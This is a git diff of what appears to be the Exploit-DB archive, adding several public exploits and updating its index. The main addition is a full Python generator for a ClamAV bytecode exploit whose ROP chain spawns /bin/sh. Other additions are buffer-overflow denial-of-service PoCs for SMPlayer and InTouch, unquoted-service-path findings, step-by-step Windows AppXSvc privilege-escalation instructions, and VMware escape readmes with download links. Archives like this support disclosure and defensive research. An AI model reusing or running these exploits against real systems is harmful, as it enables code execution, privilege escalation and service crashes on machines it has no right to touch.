diff --git a/exploits/hardware/webapps/47663.txt b/exploits/hardware/webapps/47663.txt index bda1fe705..1357237f3 100644 --- a/exploits/hardware/webapps/47663.txt +++ b/exploits/hardware/webapps/47663.txt @@ -6,7 +6,7 @@ # Software Link: https://www.lexmark.com/en_us.html​ # Version: 2.27.4.0.39 (Latest Version)​ # Tested on: Windows Server 2012​ -# CVE : N/A +# CVE : CVE-2019-16758 ​ ​ Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability.​ diff --git a/exploits/linux/local/47687.py b/exploits/linux/local/47687.py new file mode 100755 index 000000000..dd518ba13 --- /dev/null +++ b/exploits/linux/local/47687.py @@ -0,0 +1,657 @@ +#!/usr/bin/python + +''' +Finished : 22/07/2019 +Pu8lished : 31/10/2019 +Versi0n : Current (<= 0.102.0) +Result : Just for fun. + +"Because of my inability to change the world." + +In 2002, ClamAV got introducted as a solution for malwares on UNIX-based systems, built on +a signature-based detection approach, and still undergoes active-development. by that time, +LibClamAV only held 2 binaries, and expanded to 5 at present. + +ClamBC were exceptionally more complex and served as a testing tool for bytecodes, majorly +validating and interpreting the code therein, and the information provided didn't indicate +nor explain the presence of its internal mechanisms. + +The availability of the source-code and the lack of documentation led to the establishment +of this paper, it was certainly not an attempt to escalate privileges, but rather a sought +-after experience, and source of entertainment that grants the thrill of a challenge. + +Due to the considerable amount of time spent in the analysis, the dissection of the engine +was imminent, whilst significantly broadening our perception on its internal structures. +The trial and error process produced valuable information, crashes illuminated latent bugs, +effectively increasing the attack surface, and magnifying the possibility for exploitation. + +> ./exploit.py +> clambc --debug exploit +[SNIP] +$ +''' + +names = ['test1', + 'read', + 'write', + 'seek', + 'setvirusname', + 'debug_print_str', + 'debug_print_uint', + 'disasm_x86', + 'trace_directory', + 'trace_scope', + 'trace_source', + 'trace_op', + 'trace_value', + 'trace_ptr', + 'pe_rawaddr', + 'file_find', + 'file_byteat', + 'malloc', + 'test2', + 'get_pe_section', + 'fill_buffer', + 'extract_new', + 'read_number', + 'hashset_new', + 'hashset_add', + 'hashset_remove', + 'hashset_contains', + 'hashset_done', + 'hashset_empty', + 'buffer_pipe_new', + 'buffer_pipe_new_fromfile', + 'buffer_pipe_read_avail', + 'buffer_pipe_read_get', + 'buffer_pipe_read_stopped', + 'buffer_pipe_write_avail', + 'buffer_pipe_write_get', + 'buffer_pipe_write_stopped', + 'buffer_pipe_done', + 'inflate_init', + 'inflate_process', + 'inflate_done', + 'bytecode_rt_error', + 'jsnorm_init', + 'jsnorm_process', + 'jsnorm_done', + 'ilog2', + 'ipow', + 'iexp', + 'isin', + 'icos', + 'memstr', + 'hex2ui', + 'atoi', + 'debug_print_str_start', + 'debug_print_str_nonl', + 'entropy_buffer', + 'map_new', + 'map_addkey', + 'map_setvalue', + 'map_remove', + 'map_find', + 'map_getvaluesize', + 'map_getvalue', + 'map_done', + 'file_find_limit', + 'engine_functionality_level', + 'engine_dconf_level', + 'engine_scan_options', + 'engine_db_options', + 'extract_set_container', + 'input_switch', + 'get_environment', + 'disable_bytecode_if', + 'disable_jit_if', + 'version_compare', + 'check_platform', + 'pdf_get_obj_num', + 'pdf_get_flags', + 'pdf_set_flags', + 'pdf_lookupobj', + 'pdf_getobjsize', + 'pdf_getobj', + 'pdf_getobjid', + 'pdf_getobjflags', + 'pdf_setobjflags', + 'pdf_get_offset', + 'pdf_get_phase', + 'pdf_get_dumpedobjid', + 'matchicon', + 'running_on_jit', + 'get_file_reliability', + 'json_is_active', + 'json_get_object', + 'json_get_type', + 'json_get_array_length', + 'json_get_array_idx', + 'json_get_string_length', + 'json_get_string', + 'json_get_boolean', + 'json_get_int'] +o = names.index('buffer_pipe_new') + 1 +k = names.index('buffer_pipe_write_get') + 1 +l = names.index('debug_print_str') + 1 +m = names.index('malloc') + 1 + +c = 0 +for name in names: + names[c] = name.encode('hex') + c += 1 + +def cc(n): + v = chr(n + 0x60) + + return v + +def cs(s): + t = '' + + for i in xrange(0, len(s), 2): + u = int(s[i], 16) + l = int(s[i + 1], 16) + for i in [u, l]: + if((i >= 0 and i <= 0xf)): + continue + print 'Invalid string.' + exit(0) + + t += cc(l) + cc(u) + + return t + +def wn(n, fixed=0, size=0): + if n is 0: + return cc(0) + + t = '' + c = hex(n)[2:] + l = len(c) + if (l % 2) is 1: + c = "0" + c + r = c[::-1] + + if(l <= 0x10): + if not fixed: + t = cc(l) + i = 0 + while i < l: + t += cc(int(r[i], 16)) + i += 1 + else: + print 'Invalid number.' + exit(0) + + if size != 0: + t = t.ljust(size, '`') + + return t + +def ws(s): + t = '|' + e = s[-2:] + if(e != '00'): + print '[+] Adding null-byte at the end of the string..' + s += '00' + + l = (len(s) / 2) + + if (len(s) % 2) is 1: + print 'Invalid string length.' + exit(0) + + t += wn(l) + t += cs(s) + + return t + +def wt(t): + if t < (num_types + 0x45): + v = wn(t) + return v + else: + print 'Invalid type.' + exit(0) + +def initialize_header(minfunc=0, maxfunc=0, num_func=0, linelength=4096): + global flimit, num_types + + if maxfunc is 0: + maxfunc = flimit + + if(minfunc > flimit or maxfunc < flimit): + print 'Invalid minfunc and/or maxfunc.' + exit(0) + + header = "ClamBC" + header += wn(0x07) # formatlevel(6, 7) + header += wn(0x88888888) # timestamp + header += ws("416c69656e") # sigmaker + header += wn(0x00) # targetExclude + header += wn(0x00) # kind + header += wn(minfunc) # minfunc + header += wn(maxfunc) # maxfunc + header += wn(0x00) # maxresource + header += ws("00") # compiler + header += wn(num_types + 5) # num_types + header += wn(num_func) # num_func + header += wn(0x53e5493e9f3d1c30) # magic1 + header += wn(0x2a, 1) # magic2 + header += ':' + header += str(linelength) + header += chr(0x0a)*2 + return header + +def prepare_types(contained, type=1, nume=1): + global num_types + + types = "T" + types += wn(0x45, 1) # start_tid(69) + + for i in range(0, num_types): + types += wn(type[i], 1) # kind + if type[i] in [1, 2, 3]: + # Function, PackedStruct, Struct + types += wn(nume[i]) # numElements + for j in range(0, nume[i]): + types += wt(contained[i][j]) # containedTypes[j] + else: + # Array, Pointer + if type[i] != 5: + types += wn(nume[i]) # numElements + types += wt(contained[i][0]) # containedTypes[0] + + types += chr(0x0a) + return types + +def prepare_apis(calls=1): + global maxapi, names, ids, tids + + if(calls > max_api): + print 'Invalid number of calls.' + exit(0) + + apis = 'E' + apis += wn(max_api) # maxapi + apis += wn(calls) # calls(<= maxapi) + + for i in range(0, calls): + apis += wn(ids[i]) # id + apis += wn(tids[i]) # tid + apis += ws(names[ids[i] - 1]) # name + + apis += chr(0x0a) + return apis + +def prepare_globals(numglobals=1): + global max_globals, type, gval + + globals = 'G' + globals += wn(max_globals) # maxglobals + globals += wn(numglobals) # numglobals + + for i in range(0, numglobals): + globals += wt(type[i]) # type + for j in gval[i]: # subcomponents + n = wn(j) + globals += chr(ord(n[0]) - 0x20) + globals += n[1:] + + globals += cc(0) + globals += chr(0x0a) + return globals + +def prepare_function_header(numi, numbb, numa=1, numl=0): + global allo + + if numa > 0xf: + print 'Invalid number of arguments.' + exit(0) + + fheader = 'A' + fheader += wn(numa, 1) # numArgs + fheader += wt(0x20) # returnType + fheader += 'L' + fheader += wn(numl) # numLocals + + for i in range(0, numa + numl): + fheader += wn(type[i]) # types + fheader += wn(allo[i], 1) # | 0x8000 + + fheader += 'F' + fheader += wn(numi) # numInsts + fheader += wn(numbb) # numBB + fheader += chr(0x0a) + return fheader + + + +flimit = 93 +max_api = 100 +max_globals = 32773 + +num_types = 6 + + +# Header parsing +w = initialize_header(num_func=0x1) +# Types parsing +cont = [[0x8], [0x45], [0x20, 0x20], [0x41, 0x20, 0x20], [0x20, 0x41, 0x20], [0x41, 0x20]] +type = [0x4, 0x5, 0x1, 0x1, 0x1, 0x1] +num = [0x8, 0x1, 0x2, 0x3, 0x3, 0x2] +w += prepare_types(cont, type, num) +# API parsing +ids = [o, k, l, m] +tids = [71, 72, 73, 74] +w += prepare_apis(0x4) +''' +# crash @ id=0 +''' +# Globals parsing +type = [0x45] +gval = [[0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41]] +w += prepare_globals(0x1) +# Function header parsing +type = [0x45, 0x41, 0x40, 0x40, 0x40, 0x40, 0x20] +allo = [ 1, 0, 0, 0, 0, 0, 0] +w += prepare_function_header(35, 0x1, 0x0, 0x7) +# BB parsing +p = 'B' + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x0) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += '@d' + +# STORE (0x0068732f6e69622f(L=8) -> ([Var #1])) +p += wn(0x40) +p += wn(0x0) +p += wn(0x26, 1) +p += 'Nobbfifnfobcghfh' +p += wn(0x1) + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x360) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'C`fcd' + +# LOAD Var #2 = ([Var #1]) +p += wn(0x40) +p += wn(0x2) +p += wn(0x27, 1) +p += wn(0x1) + +# SUB Var #2 -= 0xd260 +p += wn(0x40) +p += wn(0x2) +p += wn(0x2, 1, 2) +p += wn(0x2) +p += 'D`fbmd' + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x10) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'B`ad' + +# LOAD Var #3 = ([Var #1]) +p += wn(0x40) +p += wn(0x3) +p += wn(0x27, 1) +p += wn(0x1) + +# SUB Var #3 -= 0x10 +p += wn(0x40) +p += wn(0x3) +p += wn(0x2, 1, 2) +p += wn(0x3) +p += 'B`ad' + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x30) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'B`cd' + +# LOAD Var #4 = ([Var #1]) +p += wn(0x40) +p += wn(0x4) +p += wn(0x27, 1) +p += wn(0x1) + +# SUB Var #4 -= 0x190 +p += wn(0x40) +p += wn(0x4) +p += wn(0x2, 1, 2) +p += wn(0x4) +p += 'C`iad' + + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x38) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'Bhcd' + +# STORE (Var #3 -> Var #1) +p += wn(0x40) +p += wn(0x0) +p += wn(0x26, 1) +p += wn(0x3) +p += wn(0x1) + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x48) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'Bhdd' + +# ADD Var #3 += 0x3 +p += wn(0x40) +p += wn(0x3) +p += wn(0x2, 1, 2) +p += wn(0x3) +p += 'Acd' + +# STORE (Var #3 -> Var #1) +p += wn(0x40) +p += wn(0x0) +p += wn(0x26, 1) +p += wn(0x3) +p += wn(0x1) + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x28) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'Bhbd' + +# ADD Var #5 += Var #2 + 0xcbda +p += wn(0x40) +p += wn(0x5) +p += wn(0x1, 1, 2) +p += wn(0x2) +p += 'Djmkld' + +# STORE (Var #5 -> Var #1) +p += wn(0x40) +p += wn(0x0) +p += wn(0x26, 1) +p += wn(0x5) +p += wn(0x1) + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x20) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'B`bd' + +# STORE (Var #4 -> Var #1) +p += wn(0x40) +p += wn(0x0) +p += wn(0x26, 1) +p += wn(0x4) +p += wn(0x1) + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x18) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'Bhad' + +# ADD Var #5 += Var #2 + 0x99dc +p += wn(0x40) +p += wn(0x5) +p += wn(0x1, 1, 2) +p += wn(0x2) +p += 'Dlmiid' + +# STORE (Var #5 -> Var #1) +p += wn(0x40) +p += wn(0x0) +p += wn(0x26, 1) +p += wn(0x5) +p += wn(0x1) + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x10) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'B`ad' + +# STORE (0x3b -> Var #1) +p += wn(0x40) +p += wn(0x0) +p += wn(0x26, 1) +p += 'Bkcd' +p += wn(0x1) + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x30) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'B`cd' + +# STORE (0x0 -> Var #1) +p += wn(0x40) +p += wn(0x0) +p += wn(0x26, 1) +p += '@d' +p += wn(0x1) + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x40) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'B`dd' + +# STORE (0x0 -> Var #1) +p += wn(0x40) +p += wn(0x0) +p += wn(0x26, 1) +p += '@d' +p += wn(0x1) + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x8) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'Ahd' + +# ADD Var #2 += 0x6d68 +p += wn(0x40) +p += wn(0x2) +p += wn(0x1, 1, 2) +p += wn(0x2) +p += 'Dhfmfd' + +# STORE (Var #2 -> Var #1) +p += wn(0x40) +p += wn(0x0) +p += wn(0x26, 1) +p += wn(0x2) +p += wn(0x1) + +''' +0x99dc : pop rdi ; ret +0xcbda : pop rsi ; ret +0x6d68 : pop rax ; ret + +Var #2 = text_base +Var #3 = syscall (+3: pop rdx; ret) +Var #4 = "/bin/sh\x00" + +pop rax; ret; o 0x8 +59 o 0x10 +pop rdi; ret; o 0x18 +sh; address o 0x20 +pop rsi; ret; o 0x28 +0x0 o 0x30 +pop rdx; ret; o 0x38 +0x0 o 0x40 +syscall o 0x48 +''' + +# COPY Var #6 = (0x5a90050f(o`e``ije)) +p += wn(0x20) +p += wn(0x0) +p += wn(0x22, 1) +p += 'Ho`e``ijeh' +p += wn(0x6) + +p += 'T' +p += wn(0x13, 1) +p += wn(0x20) +p += wn(0x6) +p += 'E' + +w += p +f = open("exploit", "w") +f.write(w) +f.close() + +print '[+] Generated payload' + +''' +Mortals represent immorality, clueless, they crush each other in an everlasting +pursuit to climb the ladder of social-status, greed is engraved in their nature, +they're materialistic, and the essence of their lives is money and wealth. +However, such definition is inaccurate as it doesn't apply to the minority. +I have discovered a truly marvelous proof of their existence, which this margin +is too narrow to contain. + +- Alien599, not Fermat. + +Greetings to Alien133, Alien610, Alien6068, Alien814, Alien641. +X +''' \ No newline at end of file diff --git a/exploits/windows/dos/47709.py b/exploits/windows/dos/47709.py new file mode 100755 index 000000000..327026f95 --- /dev/null +++ b/exploits/windows/dos/47709.py @@ -0,0 +1,23 @@ +# Title : SMPlayer 19.5.0 - Denial of Service (PoC) +# Tested on : Windows 7 (64 bit) +# Vulnerable Software: SMPlayer v 19.5.0 +# Exploit Author: Malav Vyas +# Vendor Homepage: https://smplayer.info +# Version : 19.5.0 +# Software Link : https://smplayer.info/en/downloads + +# POC +# run this python file, which will generate attack.m3u file +# .m3u file is used as a playlist +# this python file will generate a .m3u file with 25000 "A" characters. +# Open this file in SMPlayer two times. +# second time, buffer would be successfully overflowed and it would result in a Denial Of Service attack. +# For more details, please refer to video + +f="attack.m3u" + +bof = "A"*25000 + +writeFile = open(f, "w") +writeFile.write(bof) +writeFile.close() \ No newline at end of file diff --git a/exploits/windows/dos/47711.py b/exploits/windows/dos/47711.py new file mode 100755 index 000000000..7aea04977 --- /dev/null +++ b/exploits/windows/dos/47711.py @@ -0,0 +1,24 @@ +# Exploit Title: InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 12019-11-16 +# Vendor Homepage: https://on.wonderware.com/ +# Software Link : https://on.wonderware.com/intouch-machine-edition +# Tested Version: 8.1 SP1 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Pro x64 es +# InTouch Machine Edition 8.1 SP1.py + + +# Steps to Produce the Local Buffer Overflow (SEH Unicode): +# 1.- Run python code: InTouch_Machine_Edition_8.1.py +# 2.- Open InTouch_Machine_Edition_8.1.txt and copy content to clipboard +# 3.- Open ITME v8.1 InTouch Machine Edition +# 4.- On Graficos slect Atributos +# 5.- Paste ClipBoard on "No Redibujar"/"Deshabilitados" and click on "Aceptar" +#!/usr/bin/env python + + +buffer = "\x41" * 1026 +f = open ("InTouch_Machine_Edition_8.1.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/47710.txt b/exploits/windows/local/47710.txt new file mode 100644 index 000000000..ec6542b25 --- /dev/null +++ b/exploits/windows/local/47710.txt @@ -0,0 +1,34 @@ +# Exploit Title: Waves MaxxAudio Drivers 1.1.6.0 - 'WavesSysSvc64' Unquoted Service Path +# Discovery by: Luis Martinez +# Discovery Date: 2019-11-24 +# Vendor Homepage: https://www.dell.com/ +# Software Link : https://www.dell.com/support/home/mx/es/mxbsdt1/drivers/driversdetails?driverid=vwpkk +# Tested Version: 1.1.6.0 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Pro x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Audio" | findstr /i /v """ + +Waves Audio Services WavesSysSvc C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe Auto + +# Service info: + +C:\>sc qc WavesSysSvc +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: WavesSysSvc + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Waves Audio Services + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/47712.txt b/exploits/windows/local/47712.txt new file mode 100644 index 000000000..92283bc71 --- /dev/null +++ b/exploits/windows/local/47712.txt @@ -0,0 +1,36 @@ +# Exploit Title: Easy-Hide-IP 5.0.0.3 - 'EasyRedirect' Unquoted Service Path +# Date: 2019-11-22 +# Exploit Author: Rene Cortes S +# Vendor Homepage: https://easy-hide-ip.com +# Software Link: https://easy-hide-ip.com +# Version: 5.0.0.3 +# Tested on: Windows 7 Professional Service Pack 1 + +########################################################################################################################## + +Step to discover the unquoted Service: + +C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ + +EasyRedirect EasyRedirect C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe Auto + + +############################################################################################################################################## + +Service info: + +C:\Users\user>sc qc EasyRedirect +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: EasyRedirect + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : EasyRedirect + DEPENDENCIAS : RPCSS + NOMBRE_INICIO_SERVICIO: LocalSystem + +######################################################################################################################### \ No newline at end of file diff --git a/exploits/windows/local/47713.txt b/exploits/windows/local/47713.txt new file mode 100644 index 000000000..58c5fc98b --- /dev/null +++ b/exploits/windows/local/47713.txt @@ -0,0 +1,59 @@ +# Exploit Title: Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation +# Date: 2019-11-22 +# Exploit Author: Abdelhamid Naceri +# Vendor Homepage: www.microsoft.com +# Tested on: Windows 10 1903 +# CVE : CVE-2019-1385 + + +Windows: "AppX Deployment Service" (AppXSVC) elevation of privilege vulnerability + +Class: Local Elevation of Privileges + +Description: +This Poc is exploiting a vulnerability in (AppXSvc) , abusing this vulnerability +could allow an attacker to overwrite\create file as SYSTEM which can result in EOP . +The're is 2 way to abuse the issue . +Step To Reproduce : +[1] For An Arbitrary File Creation +1-Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup Into a Junction To +your target directory example "c:\" +2-Open Powershell and execute the command Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe +3-Check the directory the file should be created now +4-Enjoy:) +[2] To Overwrite File +1-Create a temp dir in %temp%\ +2-Create a hardlink to your target file in the temp created dir +3-Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup Into a junction to +your temp created dir +4-Open Powershell and execute the command Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe +5-Check the file again +Limitation : +when 'MicrosoftEdge.exe' is created it would inherit the directory permission which +mean the file wouldnt be writtable in majority of cases but a simple example of +abusement in the directory "c:\" <- the default acl is preventing Athenticated Users +from creating file but not modifying them so if we abused the vulnerability in "c:\" +we will have an arbitrary file created and also writeable from a normal user . +also you cant overwrite file that are not writable by SYSTEM , i didnt make a check +in the poc because in if the file is non readable by the current user the check will +return false even if the file is writtable by SYSTEM . NOTE : you can also overwrite +file which you cant even read them . +In the file creation make sure the path is writtable by SYSTEM otherwise the poc will +fail . I think 99% of folders are writtable by SYSTEM +Platform: +This has been tested on a fully patched system (latest patch -> November 2019) : +OS Edition: Microsoft Windows 10 Home +Os Version: 1903 +OS Version Info: 18362.418 + +Additional Info +HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\BuldLabEx = 18362.1.amd64fre.19h1_release.190318-1202 + + +Expected result: +The Deployment Process should fail with "ERROR_ACCESS_IS_DENIED" +Observed result : +The Deployment Process is overwritting or creating an arbitrary file as +"LOCAL SYSTEM" + +NOTE : It was patched on 7/11/19 \ No newline at end of file diff --git a/exploits/windows/local/47714.md b/exploits/windows/local/47714.md new file mode 100644 index 000000000..0215f85c9 --- /dev/null +++ b/exploits/windows/local/47714.md @@ -0,0 +1,25 @@ +# VMware Escape Exploit + +VMware Escape Exploit before VMware WorkStation 12.5.5 + +Host Target: Win10 x64 + +Compiler: VS2013 + +Test on VMware 12.5.2 build-4638234 + +# Known issues + +* Failing to heap manipulation causes host process crash. +* Not quite elaborate because I'm not good at doing heap "fengshui" on winows LFH. + +# FAQ + +* Q: Error in reboot vmware after crashing process. +* A: Just remove ***.lck** folder in your vm directory or wait a while and have a coffee :).Here is a simple [script](https://raw.githubusercontent.com/unamer/vmware_escape/master/cve-2017-4901/cleanvm.bat) I used to clean up. + + +![](https://github.com/unamer/vmware_escape/raw/master/cve-2017-4901/exp.gif) + + +EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47714.zip \ No newline at end of file diff --git a/exploits/windows/local/47715.md b/exploits/windows/local/47715.md new file mode 100644 index 000000000..1afee3ba9 --- /dev/null +++ b/exploits/windows/local/47715.md @@ -0,0 +1,28 @@ +# VMware Escape Exploit + +VMware Escape Exploit before VMware WorkStation 12.5.3 + +Host Target: Win10 x64 + +Compiler: VS2013 + +Test on VMware 12.5.2 build-4638234 + +# Known issues + +* Failing to heap manipulation causes host process crash. (About 50% successful rate ) +* Not quite elaborate because I'm not good at doing heap "fengshui" on winows LFH. + +# FAQ + +* Q: Error in reboot vmware after crashing process. +* A: Just remove ***.lck** folder in your vm directory or wait a while and have a coffee :).Here is a simple [script](https://raw.githubusercontent.com/unamer/vmware_escape/master/cve-2017-4901/cleanvm.bat) I used to clean up. + + +![](https://github.com/unamer/vmware_escape/raw/master/CVE-2017-4905_and_uaf/exploit.gif) + +# Reference + +* https://keenlab.tencent.com/en/2018/04/23/A-bunch-of-Red-Pills-VMware-Escapes/ + +EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47715.zip \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8a4770cdb..d8d22421f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6605,6 +6605,8 @@ id,file,description,date,author,type,platform,port 47693,exploits/linux/dos/47693.txt,"Ubuntu 19.10 - Refcount Underflow and Type Confusion in shiftfs",2019-11-20,"Google Security Research",dos,linux, 47694,exploits/ios/dos/47694.txt,"iOS 12.4 - Sandbox Escape due to Integer Overflow in mediaserverd",2019-11-20,"Google Security Research",dos,ios, 47707,exploits/windows/dos/47707.txt,"Internet Explorer - Use-After-Free in JScript Arguments During toJSON Callback",2019-11-22,"Google Security Research",dos,windows, +47709,exploits/windows/dos/47709.py,"SMPlayer 19.5.0 - Denial of Service (PoC)",2019-11-25,"Malav Vyas",dos,windows, +47711,exploits/windows/dos/47711.py,"InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)",2019-11-25,chuyreds,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10793,6 +10795,7 @@ id,file,description,date,author,type,platform,port 47676,exploits/windows/local/47676.txt,"Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path",2019-11-19,"Luis Martínez",local,windows, 47684,exploits/windows/local/47684.md,"Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation",2019-11-14,TomahawkAPT69,local,windows, 47685,exploits/windows_x86-64/local/47685.txt,"DOUBLEPULSAR (x64) - Hooking 'srv!SrvTransactionNotImplemented' in 'srv!SrvTransaction2DispatchTable'",2019-11-03,Mumbai,local,windows_x86-64, +47687,exploits/linux/local/47687.py,"ClamAV < 0.102.0 - 'bytecode_vm' Code Execution",2019-11-02,anonymous,local,linux, 47695,exploits/windows/local/47695.rb,"Windows - Escalate UAC Protection Bypass (Via dot net profiler) (Metasploit)",2019-11-20,Metasploit,local,windows, 47696,exploits/windows/local/47696.rb,"Windows - Escalate UAC Protection Bypass (Via Shell Open Registry Key) (Metasploit)",2019-11-20,Metasploit,local,windows, 47701,exploits/unix/local/47701.rb,"Xorg X11 Server - Local Privilege Escalation (Metasploit)",2019-11-20,Metasploit,local,unix, @@ -10800,6 +10803,11 @@ id,file,description,date,author,type,platform,port 47705,exploits/windows/local/47705.txt,"ProShow Producer 9.0.3797 - ('ScsiAccess') Unquoted Service Path",2019-11-22,ZwX,local,windows, 47706,exploits/windows/local/47706.txt,"LiteManager 4.5.0 - Insecure File Permissions",2019-11-22,ZwX,local,windows, 47708,exploits/macos/local/47708.txt,"macOS 10.14.6 - root->kernel Privilege Escalation via update_dyld_shared_cache",2019-11-22,"Google Security Research",local,macos, +47710,exploits/windows/local/47710.txt,"Waves MaxxAudio Drivers 1.1.6.0 - 'WavesSysSvc64' Unquoted Service Path",2019-11-25,"Luis Martínez",local,windows, +47712,exploits/windows/local/47712.txt,"Easy-Hide-IP 5.0.0.3 - 'EasyRedirect' Unquoted Service Path",2019-11-25,"Rene Cortes S",local,windows, +47713,exploits/windows/local/47713.txt,"Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation",2019-11-25,"Abdelhamid Naceri",local,windows, +47714,exploits/windows/local/47714.md,"VMware WorkStation 12.5.5 - Virtual Machine Escape",2017-08-08,unamer,local,windows, +47715,exploits/windows/local/47715.md,"VMware WorkStation 12.5.3 - Virtual Machine Escape",2019-06-06,unamer,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139